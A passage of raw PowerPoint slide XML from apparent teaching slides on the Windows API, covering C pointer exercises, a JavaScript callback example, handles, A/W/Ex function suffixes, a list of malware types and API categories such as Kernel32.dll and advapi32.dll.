              <a:t>nt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> *(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>)[50]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>[2])[5]</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4860032" y="4725144"/>
            <a:ext cx="2721194" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>rintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) = ????</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>rintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) = ?????</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>rintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) = ?????</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29554496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API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Handles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Handles are items that have been opened or created in the OS, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>a window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, process, module, menu, file, and so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>on. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>E.g. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CreateWindowEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DestroyWindow</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503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923" y="3162350"/>
            <a:ext cx="4818818" cy="3435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22979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132856"/>
            <a:ext cx="5135508" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> action(x, y, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(x, y);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> multiplication(x, y) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>        return x * y;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> addition(x, y) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>        return x + y;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    alert(action(10, 10, multiplication)); // output: 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>    alert(action(10, 10, addition)); // output: 20</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Windows API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Callback</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="this is how it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648" y="1766786"/>
            <a:ext cx="5042960" cy="248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69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API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>ANSI vs. Unicode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Windows XP, NT: ANSI code page	 (UTF-8) with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>suffix –A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DeleteFileA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> (LPCSTR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>lpFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Win2000 and later version: Unicode (UTF-16) with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>suffix -W</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DeleteFileW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> (LPCWSTR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>lpFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Windows API extended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Microsoft updates a new function which incompatible with the old one with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>suffix –Ex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>FileFirstFileA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: 2 parameters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lpFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lpFindFileData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>FileFirstFileExA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>6 parameters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lpFileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>fInfoLevelId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lpFindFileData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>fSearchOp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>lpSearchFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dwAdditionalFlags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2257076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Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Trojan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Ransomware (Crypto-ransomware)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malicious Mobile Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Spyware/Adware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223350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API - Category</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Base Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>access to the basic resources available to a Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>file systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>processes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Kernel32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Advanced </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Provide access to functions beyond the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>kernel, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>registry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>manage user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>advapi32.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>advapires32.dll</a:t>
            </a:r>
            <a:r>
